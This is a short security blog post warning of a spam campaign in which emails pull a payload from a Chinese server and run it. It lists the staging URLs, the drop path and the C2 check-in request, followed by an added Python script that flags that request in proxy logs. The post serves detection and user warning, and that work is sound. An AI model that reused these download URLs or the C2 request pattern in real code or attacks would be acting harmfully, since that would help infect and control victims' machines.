Malware Spam!
We have noticed that spam e-mails are being hurled out of a number of servers in Brazil. When downloaded, they run the exploit code below in IE, fetched from a server in China:
alobhyundajacoupe.com/scr2/cmd.txt
which refers to
alobhyundajacoupe.com/scr2/cmd2.txt
This then retrieves the file
alobhyundajacoupe.com/scr2/key.exe
which is saved as C:\malware.exe and then executed.
The below http request to blahot.com is then made:
GET /scr2/command.php?IP=10.xx.xx.xx&Port1=43750&ID=001300012005000200580044 HTTP/1.1
User-Agent:
Host: blahot.com
I'm currently trying to get my hands on some of the files, but for now more info can be found over at bleedingsnort.org, who have already created some signature files, and SANS.org, who are currently in the process of trying to shut these boxes down.
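For anyone who wants to check their own proxy logs for the check-in request quoted above rather than wait on the signature files, here is a small detector. It is example code added to this post, not something from the original author or from bleedingsnort.org; the host, path and parameter names come from the request shown above, while the log lines and the "client method url status" log layout are constructed for the example.

```python
"""Flag the /scr2/command.php check-in request in web-proxy style HTTP logs.

Example code added to this post, not from the original author. The log
lines below are constructed; the host, path and parameter names come
from the request quoted in the post.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators quoted in the post: host and path of the check-in request.
C2_HOST = "blahot.com"
C2_PATH = "/scr2/command.php"
# Query parameters the observed request carries.
REQUIRED_PARAMS = ("IP", "Port1", "ID")

# Constructed log lines in an assumed "client method url status" layout.
SAMPLE_LOG = """\
10.0.0.5 GET http://blahot.com/scr2/command.php?IP=10.0.0.5&Port1=43750&ID=001300012005000200580044 200
10.0.0.7 GET http://example.org/index.html 200
10.0.0.9 GET http://blahot.com/scr2/command.php?IP=10.0.0.9&Port1=51002&ID=001300012005000200580099 200
10.0.0.9 GET http://blahot.com/favicon.ico 404
10.0.0.11 GET http://mirror.example.net/scr2/command.php?IP=10.0.0.11&Port1=1&ID=000000 200
"""

LOG_RE = re.compile(
    r"^(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def classify(line):
    """Return a dict describing the hit, or None if the line is not a check-in."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # keep_blank_values so an empty ID= still counts as the parameter being present
    qs = parse_qs(parts.query, keep_blank_values=True)
    if parts.path != C2_PATH or not all(p in qs for p in REQUIRED_PARAMS):
        return None
    # Exact host match is high confidence; the same path and parameters on another
    # host is a weaker lead (the kit may have been rehosted), so grade it separately.
    confidence = "high" if parts.hostname == C2_HOST else "medium"
    return {
        "client": m.group("client"),
        "host": parts.hostname,
        "victim_ip": qs["IP"][0],
        "port": qs["Port1"][0],
        "id": qs["ID"][0],
        "confidence": confidence,
    }


def scan(log_text):
    """Run classify over every line and return the hits in log order."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h['confidence']:6} {h['client']} -> {h['host']} "
              f"id={h['id']} port={h['port']}")
```

The path-plus-parameters match is kept separate from the host match on purpose: the host name in a campaign like this changes quickly, whereas the check-in URL shape tends to survive a move to a new server, so the medium-confidence hits are the ones worth a second look once the known host has gone quiet.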
Now that this technique is out in the wild, it's sure to be picked up by all and sundry, so it's even more essential that you don't open (or even click on) an email from someone you don't know. And if you use a mail client, make sure you're using one that doesn't allow code to be executed, such as Thunderbird, just in case the last email showing in the client is an infected one!